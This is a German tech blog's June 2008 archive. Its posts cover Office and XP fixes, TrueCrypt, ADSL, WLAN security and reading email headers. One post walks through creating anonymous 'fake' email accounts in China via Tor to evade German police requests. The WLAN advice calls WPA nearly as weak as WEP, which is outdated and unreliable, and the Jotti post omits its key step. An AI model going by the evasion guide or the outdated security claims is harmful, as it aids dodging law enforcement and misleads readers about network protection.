Monatliches Archiv für: Juni, 2008

Mac Office 2008 SP1 Setup Assistent schleife

Jun26
2008 3 Kommentare Geschrieben von Daniel

Seit einiger Zeit gibt es das Service Pack 1 für Mac Office 2008.

Wer einen key bereits für die vorgänger Version hätte wird wahrscheinlich nach dem update das Problem haben das sich immer wenn man z.B. Word startet der Setup Assistent startet und der auch nicht weg zu kriegen ist.

Lösung: Es muss lediglich eine neue Serial eingegeben werden.

Ihr löscht einfach folgende Files:

* “/Users/username/Library/Preferences/Microsoft/Office 2008/Microsoft Office 2008 settings.plist”

und

* “/Applications/Microsoft Office 2008/Office/OfficePID.plist”

…dann ist euer Problem gelößt :)

Geposted in Bugs, Mac Stuff - Schlagwörter , , , ,

LAN Einstellungen “Authentication” verschwunden

Jun26
2008 Kommentieren Geschrieben von Daniel

Nach dem update auf Windows XP Service Pack 3 (SP3) habe ich mich plötzlich gewundert wieso ich nichtmehr den Punkt “Authentication” in den “Local Area Connection” Einstellungen hatte. (Da kann man unteranderem die IEEE 802.1X authentication aktivieren)

Dieser ist nämlich unter SP3 standardmässig deaktiviert und muss erst Manuel auf Automatisch gesetzt werden bzw. gestartet werden.

Dazu geht ihr einfach in die Services Verwaltung und startet den Service “Wired AutoConfig” (Unter englischem XP heißt das zumindestens so). Und stellt gleichzeitig den Status auf “Automatisch“.

Dann sieht er den punkt Authentication wieder :)

Geposted in Tipps&Tricks, Win Stuff - Schlagwörter , , ,

Liste mit allen Router-Standardpasswörtern

Jun07
2008 Kommentieren Geschrieben von Daniel

Eine große Liste mit Standard Routerpasswörtern findet ihr:

HIER

Geposted in Security Informations - Schlagwörter ,

So verschlüsselt ihr eure (externe) Festplatte mit Hilfe von TrueCrypt

Jun06
2008 Kommentieren Geschrieben von Daniel

Vorraussetzungen:
Eine Partition, die ihr verschlüsseln wollt, so wie ein Passwort, das nur ihr wisst und ihr nicht mehr vergessen werdet, denn ansonsten kommt ihr nicht mehr an die Daten ran!

Lektion 1 – Partition verschlüsseln

- TrueCrypt starten und “Create Volume” auswählen.
- Ob sichtbar oder unsichtbar (hidden) könnt ihr selbst entscheiden. Klickt dann auf Next.
- Jetzt sucht ihr die zu verschlüsselnde Partition, bestätigt mit Ok, und lasst den Haken bei “Never Search History” drin. Next!

Entcryption Algorithm: Wählt AES aus.
Hash Algorithm: SAH-1

Klickt weiter bis ihr zum letzten Feld gelangt:
Nun müsst ihr das Passwort eintippen.
Ihr dürft es nicht mehr vergessen…!

Filesystem: NTFS
Cluster: Default

Bitte beachtet, dass eure Partition formatiert wird!!!

Jetzt klickt ihr auf “Format” – das kann dauern.

Lektion 2 – Partition mounten
(muss vor der Benutzung gemacht werden)

- True Crypt starten und auf “Select Device” klicken, dort wählt ihr die zu entschlüsselnde Partition aus.
- Wählt im Fenster einen Laufwerksbuchstaben aus! Doppelklick.
- Passwort eintippen! (Nicht die Option “Cache Password and Keyfiles in Memory” auswählen!)
- Ok!
- Jetzt ist die Partition im Arbeitsplatz sichtbar und ihr könnt darauf zugreifen.

Geposted in Win Stuff

Jotti’s malware scan ohne Wartezeit

Jun06
2008 Kommentieren Geschrieben von Daniel

Ihr kennt das sicher: jemand schickt euch eine Datei und ihr wollt sie auf Viren überprüfen.

Ihr geht also auf http://virusscan.jotti.org/, da man dort Dateien kostenlos von vielen Scannern scannen lassen kann und die Ergebnisse schön übersichtlich geliefert bekommt. Allerdings gibt es einen Haken: die ewige Wartezeit, weil der Service ständig überlastet ist.

Doch damit ist nun Schluss, denn es gibt einen einfachen Weg, die Wartezeit zu umgehen:

Nun öffnet ihr die Datei mit einem beliebigen Browser und öffnet die zu scannende Datei mithilfe des “Durchsuchen…”-Buttons und klickt auf “Datei uploaden + scannen”!

Die angegebene Datei wird dann ganz normal hochgeladen und gescannt!

Geposted in Security Informations

Chinesische eMailadresse

Jun06
2008 Kommentieren Geschrieben von Daniel

mail.ru ist schon eine geile variante um fake Email adressen zu erstellen. Doch bei unseren Chinesischen Genossen braucht man nur einen Usernamen und ein Passwort um seine Email adresse zu erstellen. Rechtlich gesehen wird dort aber das Internet überwacht deshalb kann es passieren das eure Email adressen aufmerksamkeit eregen weil ihr von Europäischen Servern Emails bekommt. China würde aber niemals ihre Bürger damit belästigen Daten irgentwelcher Europäer herauszugeben ohne eigenutz dafür zu haben. Mal abgesehen davon gibt es in China genügend Menschen die auch Email adressen haben sodas man es unmöglich ist wirklich jeden zu Kontrollieren. Das BKA und die Polizei dürfen auch nicht so ohne weiteres mal eben nach unseren Daten fragen ohne vorher die Regierung selbst davon zu Informieren. Die Geschichte mit Merkels PC und den Chinesischen Hackern kennen wir doch noch alle oder?

es handelt sich um folgenden, in China stehenden Server: 61.135.181.176
sohu.com

1. erstmal aktivieren wir Tor oder einen sicheren Proxy.

2. wir gehen auf http://passport.sohu.com/web/signup.jsp
ich hoffe ihr habt den Chinesischen zeichensatz installiert.
das erste Feld sollte klar sein, ist der Username für eure Email
Feld zwei und drei sind Passwort und Passwort wiederholen.
das Auswahlmenü soll die Sicherheitabfrage darstellen die ihr so lassen könnt.
die Antwort dazu könnt ihr euch ausdenken aber nehmt etwas Kommliziertes damit Hacker aus Deutschland es nicht so einfach haben. Generiert euch passwörter oder so.

3. hier kommt jetzt unsere bestätigung das wir es geschaft haben. Nun können wir durch einen Klick auf den Button direkt in unser Postfach. Vorher kommt aber noch ein Dialogbox, der uns davon zu überzeugen versucht, unsere Personalien anzugeben was wir selbstverstänlich nicht machen und auch nie machen müssen.

4. haben wir uns ausgelogt, so können wir über die portalseite: http://www.sohu.com/ wieder einlogen. nachdem wir das getan haben sollte ein Email Icon zu erkennen sein. Der text dahinter ist der link zum Postfach.

5. wollen wir nun frecherweise auch noch eine Email lesen so gehen wir auf den Zweiten Link in der ersten Navigationsbox.

Geposted in Allgemein

ADSL – Was macht es eigentlich ?

Jun06
2008 Kommentieren Geschrieben von Daniel

1.1 Einleitung

Angesichts steigender Datenvolumen stossen analoge Modemtechnologien und ISDN immer häufiger an technische Grenzen. Abhilfe schafft ADSL.

Aufwendig gestaltete Informationsangebote im Internet und neue Kommunikationsbereiche wie Video-on-demand, Videoconferencing oder auch Telearbeit erfordern höchste Transferraten und somit neue Übertragungstechniken. Dabei ist die analoge Modemtechnologie mit Einführung von V.90 weitgehend ausgereizt und auch ISDN stösst zunehmend an Grenzen: Selbst bei optimalen digitalen Verbindungen sind flüssige Übertragung aufwendiger Animationen aus dem Internet oder Konferenzschaltungen mit Bild und Datenaustausch nur selten möglich.

Bereits seit Anfang der neunziger Jahre gibt es eine technische Lösung, die weitaus höhere Transferraten über das herkömmliche Telefonnetz (POTS, Plain Old Telephone Service) ermöglicht: ADSL (Asymmetric Digital Subscriber Line). ADSL ist ein Protokoll aus der xDSL-Familie, das den Vorteil bietet, das herkömmliche Kupferleitungsnetz zu unterstützen – ein teures Umrüsten auf Glasfaserkabel entfällt.

1.2 Das DSL-Prinzip: Kanaltrennung

Ende der Achtziger präsentiert Bellcore (http://www.bellcore.com) mit der DSL-Technologie erstmals eine komplette Protokollfamilie für den schnellen Datenaustausch. Der DSL-Ansatz setzt auf nicht ausgelastete Bandbreiten innerhalb des Kupferkabelnetzes. Derzeit werden die Kabel lediglich zur Übertragung von Sprache im Telefonverkehr genutzt – was Frequenzen von bis zu 4 kHz belegt. Kupferkabel decken jedoch einen Frequenzbereich bis zu 1,1 MHz ab – bieten also Platz für mehr als 250mal soviel Informationen. Dabei beschränken lediglich Filter im Telefonnetz den nutzbaren Frequenzbereich. Um die brachliegenden Frequenzbereiche also effektiv zu nutzen, ist schlichtweg eine Aufteilung des Kupferkabels erforderlich. Der Nachteil ist allerdings, dass in hohen Frequenzbereichen enorm Verluste auftreten. Aus diesem Grund finden in der Praxis nur Bandbreiten bis 120 kHz Verwendung.

Die Kupferleitung wird von xDSL-Modems in drei Kanäle aufgeteilt: Ein Kanal steht wie bisher den Telefondiensten zur Verfügung (POTS-Kanal), ein zweiter wird für die Verbindung vom Anwender zum Provider verwendet (Upstream-Kanal) und der dritte (Downstream-Kanal) dient der Datenübertragung vom Anbieter zurück zum Anwender. Digitale Modems sorgen in den Vermittlungsstellen dafür, dass der POTS-Kanal durch Filter von den beiden anderen Bereichen strikt getrennt wird.

1.3 Trennung bietet neue Nutzungsoptionen

Erst diese Trennung ermöglicht eine gleichzeitige Nutzung des Kabelnetzes für Sprach- und Datenübertragung. Dabei ermöglicht ADSL Übertragungsraten zwischen 0,5 und 55 MBit/s, wobei die Grenzen hauptsächlich von Kabellänge und -querschnitt definiert sind.

1.4 Theoretische Grenzen im analogen Netz
Die Grenzen der Übertragungskapazität der analogen Telefonleitung sind durch das Nyquist- und das Shannon-Theorem beschrieben. Das Nyquist-Theorem besagt, dass die Schrittgeschwindigkeit bei der verzerrungsfreien Übertragung von Impulsen maximal doppelt so gross wie die Bandbreite des benutzten Übertragungskanals sein darf. Das Shannon-Theorem beschäftigt sich mit Zusammenhängen zwischen der verfügbaren Bandbreite, dem Verhältnis zwischen Signal- und Rauschpegel und der maximal möglichen Anzahl übertragbarer Bits pro Sekunde. Beim derzeitigen analogen Telefonnetz ist die Bandbreite auf 4 kHz beschränkt und das Signal-/Rauschverhältnis liegt bei 30 bis 35 dB. Daraus resultiert eine Übertragungsrate von maximal 35 kBit/s.

1.5 Potential und Einschränkungen
ADSL ermöglicht nun durch die Kanalteilung unterschiedliche Datenübertragungsraten: Während der Telefonkanal wie bisher auf 35 kBit/s begrenzt bleibt, sind die neuen Datenkanäle wesentlich erweiterbar. Durch das asymmetrische Verfahren kann für den Zugang vom Benutzer zum Dienstleister eine geringere Übertragungsgeschwindigkeit eingestellt werden als für das Downloaden von Daten. Dabei weisen die Kanäle lediglich unterschiedliche Frequenzbereiche auf. Untersuchungen belegen, dass die Upload- Datenmengen im Verhältnis zu Downloads unterhalb von zehn Prozent liegen. Diesen Umstand nutzt ADSL und prädestiniert damit die Technologie für den Zugriff auf das Internet.

In der Praxis werden über die Downstream- Leitungen vom Provider zum Anwender Übertragungswerte zwischen 1,5 und 6,1 MBit/s erzielt, was bereits bei der schlechtesten Transferrate gegenüber ISDN eine um den Faktor 24 bessere Performance bietet. Bei Upstream-Verbindungen liegen die Werte bei 16 bis 640 kBit/s auf den Leitungen zum Zugangsknoten. Jeder Kanal lässt sich zudem in weitere Subkanäle unterteilen.

1.6 Übertragungsfaktoren
Allerdings ist das Erreichen der maximalen Übertragungsgeschwindigkeit von verschiedenen Faktoren abhängig: Insbesondere die Länge und der Querschnitt des Kupferkabels sowie die Dämpfung begrenzen die theoretisch möglichen Tranferraten. In der Praxis bedeutet das für Anwender, deren Hausanschluss weit von der nächsten Vermittlungsstelle entfernt liegt, Tranferraten im unteren Bereich.

1.7 ADSL-Intern
ADSL basiert technisch auf der Trennung des nutzbaren Frequenzspektrums in drei Kanäle. Hierbei finden zwei unterschiedliche Verfahren Verwendung: Frequency Division Multiplexing (FDM) oder Echo Cancellation (EC). Welches System zum Einsatz kommt, liegt bislang noch in Händen der Gerätehersteller. Vorgaben von Seiten der ADSL-Spezifikation gibt es nicht. Es zeichnet sich allerdings ab, dass EC eine untergeordnete Rolle spielt. Grund dafür ist, dass im Gegensatz zu FDM die Kanäle für Up- und Downstream nicht komplett getrennt, sondern überlagert werden. Dies erhöht den technischen Aufwand zur Signaltrennung wesentlich und verteuert die Endgeräte.

FDM hingegen erzeugt einen schmalbandigen Frequenzbereich, der direkt oberhalb der Sprachfrequenzen angesiedelt ist. Der breitbandige Downstream-Bereich schliesst direkt an den Upstream-Bereich an.

1.8 Datentransfer per ADSL
Frequency Division Multiplexing beziehungsweise Echo Cancellation sorgen lediglich für die Trennung des Frequenzspektrums in entsprechende Kanäle, schaffen also nur die Grundlage für den eigentlichen Datentransfer. Dieser kann wiederum durch verschiedene Übertragungsmethoden realisiert werden. Auch hier lässt die ADSL-Spezifikation, die in Händen von ANSI (American National Standards Institute) und ETSI (European Telecommunications Standards Institute) liegt, verschiedene Methoden zu. Daher kommen derzeit in der Praxis drei Modulationsverfahren zum Einsatz, die zueinander inkompatibel sind. Ähnlich wie anfangs bei der 56k-Technik kann es also dem Anwender passieren, dass eine Kommunikation trotz gleicher Basistechnologie scheitert. Folgende Verfahren kommen derzeit zur Anwendung:

· QAM (Quadrature Amplitude Modulation). Hier werden die Signale einfach in einen höheren Frequenzbereich versetzt. Dies wird durch Modulation eines Basisbandsignals mit einem Trägersignal erreicht, wobei die Amplitude moduliert wird.

· CAP (Carrierless Amplitude/Phase Modulation): Grundlage von CAP ist eine trägerlose Amplituden-/Phasenmodulation. Ein einziges Trägersignal dient als Transportmittel, das selbst weder übertragen wird noch eigene Informationen beinhaltet.

· DMT (Discrete Multi-Tone Modulation) beschreibt ein Verfahren, bei dem mehrere Trägersignale für die Übermittlung eingesetzt werden. Die übermittelten Daten verteilen sich also auf eine Vielzahl von Trägern, die alle eine Form der Quadrature Amplitude Modulation (QAM) einsetzen. DMT basiert auf der Discrete-Fast-Fourier- Transformation, die aus der digitalen Technik stammt.

1.9 Übertragungsmethoden im Detail

QAM ist ein sogenanntes Einträger- Bandpassübertragungsverfahren, das ein Trägersignal mit einem Symbolstrom moduliert. Bei diesem Verfahren wird der Datenstrom in zwei einzelne Ströme halber Übertragungsrate aufgespaltet und anschliessend mit einem Trägerpaar aufmoduliert. Bei den orthogonalen Trägern handelt es sich um eine Sinus- und eine Kosinusfunktion.

Der Sender beinhaltet einen Scrambler (Chiffrierer), einen Leitungskodierer, einen Sendefilter, einen Modulator und einen D/A- Wandler. Das Signal wird in einem Demultiplexer in zwei Teilsignale aufgeteilt. Diese Teilsignale durchlaufen anschliessend die Leitungscodierer, die eine Bit-nach-Symbol- Kodierung ähnlich wie bei der 56k-Technologie vornehmen. Anschliessend werden die kodierten Signale im Modulator mit einer definierten Frequenz (f0) multipliziert. Das eine Signal wird mit einem Kosinus, das andere mit einem Sinus moduliert. Anschliessend erfolgt die Addition sowie eine D/A-Wandlung. Ein Sendefilter schliesslich bringt das Signal auf die Leitung.

Auf der Empfängerseite passiert ähnliches: Das Signal wird zunächst in einem Empfangsfilter bandbegrenzt und nach einer A/D-Wandlung mit einem Kosinus- beziehungsweise Sinusträger gleicher Frequenz wie beim Sender multipliziert. Ein nachfolgender Entzerrer macht eventuell bei der Übertragung aufgetretene Verzerrungen des Leiterpaares rückgängig und filtert die Frequenzanteile (f0) heraus. Danach liegt wieder das ursprüngliche Basisbandsignal vor. Dieses wird für das jeweilige Signal getrennt dekodiert, um die Teilsignale schliesslich in einem Multiplexer (zur Serialisierung der Signale) zusammenzufassen.

1.10Carrierless Amplitude/Phase Modulation

Auch CAP zählt zu den Einträger- Bandpassübertragungsverfahren. Schon die Bezeichnung des Modulationsverfahren deutet seine Besonderheit an: Es wird eine trägerlose Amplituden-/Phasenmodulation durchgeführt, wobei ein technischer Kniff die Übertragung der Trägerfrequenz verhindert. Zusätzlicher Unterschied zu QAM: Modulation und Demodulation erfolgen beim Sender und Empfänger über digitale Filter.

Die Grafik verdeutlicht die Arbeitsweise der CAP. An die Stelle der orthogonalen Trägerfunktionen von QAM treten digitale Filter, um die Teilströme zu modulieren. Das zu übertragende Signal wird einfach durch Addition der beiden Filterausgaben gebildet.

Nachdem das Signal eine D/A-Wandlung erfahren hat und den Sendefilter passiert hat, wird es auf die Leitung gelegt.

1.11Discrete Multi-Tone Modulation

Im Unterschied zu CAP und QAM zählt DMT zu den sogenannten Mehrträger- Bandpassübertragungsverfahren. Dieses Verfahren findet bei den Herstellern derzeit breite Unterstützung. Zur Umsetzung wird der gesamte Übertragungskanal in mehrere Teilkanäle unterteilt, die – theoretisch – die gleiche Bandbreite aufweisen. Im einfachsten Fall findet bei jedem dieser Teilkanäle das gleiche Modulationsschema Verwendung. Die Übertragungsrate ist daher identisch. Allerdings hat dies einen entscheidenden Nachteil gegenüber den zuvor beschriebenen Modulationsmethoden: Liegen Teilkanäle in hohen Frequenzbereichen, schlagen sich die schlechten Übertragungseigenschaften von Kupfer auf den Datentransfer nieder. Daher legen die Hersteller die Bitrate des jeweiligen Teilkanals entsprechend seiner Störanfälligkeit fest. Nur so ist eine optimale Nutzung des Übertragungsmediums Kupfer möglich.

DMT lässt sich im Prinzip als eine Reihe von parallel arbeitenden QAM-Systemen verstehen. Dabei verwendet jedes QAM-System die zu einem DMT-Teilkanal korrespondierende Trägerfrequenz. Der Transmitter moduliert Daten, indem er Töne bestimmter Frequenzen erzeugt, diese zusammenfasst und schliesslich über die Leitung schickt.

1.12Vorteile der neuen Technik

Bei hinreichend kleiner Teilkanalbandbreite ist die Dämpfung für jeden einzelnen Teilkanal nahezu konstant. Ein weiterer Vorzug dieser Technik: Beim Empfänger entfällt der Entzerrer. Es reicht ein einfacher Kanalverstärker, da der Einfluss der nichtlinearen Phase des Kabels auf das übertragene Signal in einem Teilkanal vernachlässigbar ist. Damit ist die Herstellung derartiger ADSL-Modems relativ preiswert.

Allerdings setzt ein Mehrträger- Modulationsverfahren Orthogonalität zwischen den verschiedenen Teilkanälen voraus. Dies kann man beispielsweise durch die Verwendung von Fast-Fourier-Transformation-Methoden erreichen. Der Aufbau eines DMT-ADSL- Transceivers entspricht im wesentlichen dem eines CAP-ADSL-Gerätes.

Wie bereits erwähnt, kann die Anzahl der Bits, die über einen Teilkanal gesendet werden, bei DMT variieren. Daraus ergibt sich eine verbesserte Performance, da störanfällige Frequenzen aussen vor bleiben. Die mögliche Übertragungsrate beim Upstream-Kanal erhöht sich dabei auf 176 kBit/s.

2 Die Zukunft: VDSL
ADSL ist eine interessante Technologie, von der nicht nur Internetnutzer, sondern auch Informationsanbieter profitieren. Allerdings stellt ADSL lediglich die erste Stufe innerhalb der neuen DSL-Technik dar: Obwohl ADSL in Deutschland noch immer in Pilotversuchen steckt, haben die Hersteller bereits Geräte der nächsten Generation im Versuchsstadium: Die nächste Version des digitalen Breitbandzugangs heisst VDSL (Very-high-bit-rate Digital Subscriber Line).

VDSL ist der ADSL-Technologie sehr ähnlich, da die Kanalaufteilung ebenfalls asymmetrisch erfolgt – sprich unterschiedliche Down- und Upstream-Bereiche nutzt. Voraussetzung für VDSL ist jedoch ein Hybridnetz, das aus Glasfaser- und Kupferleitungen besteht. Durch den Einsatz von Glasfaser lässt sich die mögliche Übertragungsrate extrem nach oben schrauben.

Beim Aufbau von Hybridanschlussnetzen werden derzeit mehrere Ansätze verfolgt. Man unterscheidet zwischen Fibre To The Curb (FTTC), Fibre To The Neighborhood (FTTN), Fibre To The Basement (FTTB) und Fibre To The Home (FTTH).

3 FTTH
FTTH ist sehr teuer, da dazu bis zur Haustür beziehungsweise zum Modem Glasfaserleitungen liegen müssten. Entsprechende Infrastrukturen fehlen derzeit noch. Eine günstigere Alternative wäre FTTN. Bei dieser Strategie werden sogenannte Optical Network Units (ONUs) installiert, die über Glasfaser verkabelt sind. Die letzten Teilstücke zum Endanwender lassen sich über existierende Kupferleitungen überbrücken. Allerdings liegen hier noch Probleme: VDSL will Daten mit einer maximalen Downstream-Übertragungsrate von bis zu 55 MBit/s zum Empfänger bringen. Dazu dürften die Kupferleitungen bei den bisherigen Querschnitten jedoch nicht länger als 300 Meter sein. Dies ist entschieden zu wenig, um in der Praxis umsetzbar zu sein.

Ansonsten baut VDSL im wesentlichen auf dieselben technischen Grundlagen wie ADSL, wobei jedoch neben den beschriebenen Übertragungsmethoden zwei weitere in der Diskussion sind:

· DWMT (Discrete Wavelet Multitone)

· SLC (Simple Line Code)

Geposted in Allgemein

Sicherheitstipps für WLAN

Jun06
2008 Kommentieren Geschrieben von Daniel

Es gibt viele Leute die sich einen Accesspoint kaufen,
ihn an den Computer dranhängen, sich freuen das beim ersten Anlauf
alles geklappt hat und sich danach nie wieder Gedanken darüber machen.

Die wenigsten lesen sich das beiliegende Handbuch durch oder befassen sich mit
den Sicherheitseinstellungen.. und genau das ist ein Fehler!

Wenn keine Verschlüsselung aktiviert wird kann zB der Nachbar falls er
eine WLAN Karte besitzt sich problemlos dazuklinken und auf das Netzwerk des
nebenan wohnenden zugreifenund zB auch auf Kosten dessen im Internet surfen.

Hier einige Möglichkeiten für mehr Sicherheit im eigenen WLAN:

[1] – WEP

Bietet begrenzten Schutz. WEP stellte sich als nicht besonders sicher herraus
und es kursieren auch einge Programme (wie zB Airsnort, WEPCrack,..)
im Internet mit denen man WEP-Keys knacken kann.

Dazu werden Datenpakete gesammelt und verglichen, Airsnort braucht dazu
ca. 5-10 Millionen solcher Pakete!
Die Dauer bis ein Angreifer diese Anzahl von Paketen hat hängt vom Traffic
im WLAN ab und kann auch mehrere Tage dauern, dem Nachbar wärs aber sicher egal ;p

WEP arbeitet mit einem Shared-Key welcher für Verschlüsselung und Authentifizierung
zuständig ist. Aus dem Shared-Key und einem Initialisierungsvektor wird ein Wert
zum verschlüsseln der Pakete gebildet. Die Initialisierungsvektoren werden
im Klartext übertragen und es werden zu schwache Schlüssel basierend
auf dem RC4-Algorithmus verwendet.

Verfügbar in der 40bit und in der 104bit Variante!
(Obwohl auf der Verpackung warscheinlich 128bit und 64bit steht..)

12 23 45 68 90
-
12 34 56 78 90 12 34 56 78 90 12 34 56

Bei grösseren Wavelans sollte der WEP-Key regelmässig geändert werden!

[2] – Default Passwörter

Standard Administrations-Passwörter des Accesspoints ändern!
Wir wollen ja nicht das jemand die Kontrolle des Accesspoints an sich reisst
und ihn totkonfiguriert.. klingt albern, ist aber möglich!

[3] – SSID

Ändere die Default-SSID!
Aber nicht in deinen Firmennamen, deine Adresse o.ä.
Je unauffälliger desto besser!
Es gibt auch Accesspoints bei welchen man die Broadcast SSID deaktivieren kann.
Das ist auch um einiges sicherer denn so können sie nicht von allen WLAN-Sniffern
erkannt werden. Netstumbler (welcher von vielen Wardrivern genutzt wird)
wird das Wavelan jetzt nicht mehr als solches erkennen
aber Tools welche im Monitormode arbeiten im Gegenteil dazu schon noch.
(zB Kismet, Airopeek,..)

[4] – MAC Filter/ Access Control List

Eine weitere Schutzmaßnahme ist es das Netzwerk nur für gewisse MAC-Adressen
zugänglich zu machen. Das wird einen Angreifer der rein will sicher nicht daran
hindern denn die MAC-Adresse der miteinander kommunizierenden Rechner kann ermittelt
und gespooft werden. Das bedeutet das sich der Angreifer seine MAC-Adresse
in die des Computers im WLAN ändert und schon hat er zutritt. Jedoch kann ein Userlimit
verwendet werden das die Anzahl der Clients festlegt welche mit dem Accesspoint
verbunden sein können und keine weiteren Verbindungen zulässt.

[5] – WEPplus, WEP2/TKIP, 802.11i, …

Update von WEP auf WEPplus(Agere),.. oder einer anderen neuen Sicherheitsmaßnahme
in welchem die oben besagten Schwachstellen beseitigt sind!
Hängt aber ganz vom gekauften Produkt ab ob der Hersteller Updates
zu den neuen Sicherheits-Verfahren zur Verfügung stellt oder nicht.
Und all diese neuen Protokolle sind meist nur mit Produkten der selben Firma
kompatibel. Das heisst man braucht also Accesspoint und Wavelan Karte
vom selben Hersteller ansonsten ist es zwecklos.
Aber am besten gleich einen Accesspoint und die dazugehörige Karte mit
der entsprechenden Schutzmaßnahme kaufen, so erspart man sich einiges..

Die Anfangs als WEP-Nachfolger geplante Sicherheitsmassnahme WPA ist wie sich
herausstellte fast genauso unbrauchbar und WEP.
Mehr Infos und einen detailierten Bericht gibts hier:
http://www.golem.de/0311/28361.html
http://wifinetnews.com/archives/002452.html

[6] – VPN

Die einzig wirklich sichere Maßnahme zum Schutz eines 802.11b Wavelans heisst VPN.
Zu empfehlen ist es sich einen VPN-Router mit IPsec anzuschaffen!
Sehr gut soll der Linksys BEFSX41 sein.
Bei einem VPN Router wird der gesamte Datenverkehr über einen VPN-Tunnel gesendet
welcher nichts nach aussen lässt und somit auch so gut wie keine Chancen für Angreifer bietet.
Weiters gibt es noch die Möglichkeit im VPN statt IPSec SSL einzusetzen
bleibt dann ganz dem Benutzer selbst überlassen.
Für genauere Auskünfte über aktuelle Produkte am besten bei einem Fachhändler nachfragen.

Geposted in Security Informations

eMail header

Jun06
2008 Kommentieren Geschrieben von Daniel

Vorwort:

Da mein letztes Tut ja totale Begeisterung bei allen hervorgerufen hat habe ich mich dazu überreden können ein weiteres zu schreiben. Oder anders gesagt: Ich fange jetzt mal an überhaupt ein richtiges Tutorial zu schreiben. Der letzte Versuch war ein Reinfall. Naja auch egal. Es war halt kein Thema für ein Tut … nur ne kleine Erklärung/Tipp für ein Spaß-Wurm/Virus.

Inhalt:
———-
1. Header ?? Was ist ??
2. Die Ip des anderen aus dem Header lesen.
3. Kann man einen Header fälschen ??
4. Noch ein Tipp an Noobies.

1. Header ?? Was ist ??

–> Also gehen wir mal davon aus ihr schreibt eurem Freund oder Feind oder Lehrer(=Feind *gg*) eine E-Mail. Dort schreibt ihr dann den Text und wenn ihr ganz lieb seit auch noch den Betreff. Aber wenn der Empfänger die E-Mail liest dann steht da doch noch viel mehr …
Da steht z.B. der Absender, das Datum wann die E-Mail abgeschickt wurde und wo bitte habt ihr das eingegeben ??
Nirgends. Das schreibt euer Mail-Dienst (in meinen Fällen waren das Yahoo.com,freenet.de,web.de und GMX.de) selber in die E-mail bevor er diese abschickt.
Der Header ist dabei natürlich nicht so groß das man Stunden braucht die E-Mail zu öffnen, aber er kann schon “recht groß” werden und hin und wieder eine sehr komische Form annehmen. Jeder E-Mail-Dienst gestaltet seinen Header individuell (das Aussehen und den Inhalt, wobei die Basisinformationen immer enthalten sind). Wie wann in den Beispielen sehr schön nachher sehen kann.
An besten empfielt es sich tatsächlich sich ein yahoo.com-Konto einzurichten, da man bei diesen den Header meiner Meinung nach immernoch am besten lesen kann.
Eigentlich jeder E-Mail-Dienst im Internet beitet die Möglichkiet den Header sichtbar zu machen:

Web.de —> Über der E-Mail (unter dem Button “Im Adressbuch”) auf “erweiterten Header anzeigen” Anzeigen gehen.
GMX.de —> Oben rechts bei den drei kleinen Symbolen den rechten (“Ausdruck der Header-Informationen). Keine Sorge der Druck das dann nicht !!
Freenet.de-> Gant rechts neben “Betreff” –> “Header anzeigen »”
Yahoo.com–> In der Leiste über den Buttons (Löschen etc.) ganz rechts ” Full Headers”

Ok. Dann werde ich euch auch einmal in den Genuss kommen lassen die Header der Einzelnen Dienste lesen zu können. Ich habe hierbei alle Mails an meine Web.de-Adresse geschickt und nun lediglich Absender (absender@gmx.de oder absender@yahoo.com) und Empfänger (immer empfänger@web.de) verändert. Ach ja und meine Ip Adresse natürlich *gg* (welche das ist wird aber erst später erklärt) Als Betreff habe die Mails immer Freenet-Test-Header, GMX-Test-Header usw. und der Text ist immer Freenet-Header, GMX-Header usw.

Yahoo :
———————————-
Received: from [216.155.196.148] (helo=web61305.mail.yahoo.com) by mx31.web.de with smtp (WEB.DE 4.101 #87) id 1C3Xna-0005mO-00 for Empfänger@web.de; Sat, 04 Sep 2004 12:29:34 +0200 Message-ID: <20040904102933.21631.qmail@web61305.mail.yahoo.com> Received: from [212.204.11.178] by web61305.mail.yahoo.com via HTTP; Sat, 04 Sep 2004 03:29:33 PDT Date: Sat, 4 Sep 2004 03:29:33 -0700 (PDT) From: Eve Beefe Subject: Yahoo-Test-Header To: EMpfänger@web.de MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=”0-1584970343-1094293773=:20844″ Sender: absender@yahoo.com
Yahoo-Header
———————————-

GMX :
———————————-
Received: from [213.165.64.20] (helo=mail.gmx.net)
by mx13.web.de with smtp (WEB.DE 4.101 #87)
id 1C3XtY-0000QF-00
for empfänger@web.de; Sat, 04 Sep 2004 12:35:44 +0200
Received: (qmail 15045 invoked by uid 0); 4 Sep 2004 10:35:44 -0000
Received: from 212.204.11.178 by www48.gmx.net with HTTP;
Sat, 4 Sep 2004 12:35:44 +0200 (MEST)
Date: Sat, 4 Sep 2004 12:35:44 +0200 (MEST)
From: absender@gmx.de
To: empfänger@web.de
MIME-Version: 1.0
Subject: Gmx-Test-Header
X-Priority: 3 (Normal)
X-Authenticated: #24262794
Message-ID: <29175.1094294144@www48.gmx.net>
X-Mailer: WWW-Mail 1.6 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset=”us-ascii”
Content-Transfer-Encoding: 7bit
Sender: absender@gmx.de

GMX-Header
———————————–

Web.de :
[[Hier Achtung da Empfänger und Sender gleich sind]]
———————————–
Received: from fmomail04.dlan.cinetic.de ([172.20.0.176] helo=web.de) by mxint01.web.de with smtp (WEB.DE 4.101 #87) id 1C3XuO-0002Qo-01 for empfänger@web.de; Sat, 04 Sep 2004 12:36:36 +0200 Received: from 212.204.11.178 by freemailng0105.web.de with HTTP; Sat, 04 Sep 2004 12:36:33 +0200 Date: Sat, 04 Sep 2004 12:36:33 +0200 Message-Id: <644329988@web.de> MIME-Version: 1.0 From: To: empfänger@web.de Subject: Web.de-Test-Header Precedence: fm-user Organization: http://freemail.web.de/ Content-Type: text/html; charset=”iso-8859-1″ Content-Transfer-Encoding: 7bit Sender: empfänger@web.de
Web.de-Header
———————————–

Freenet :
———————————–
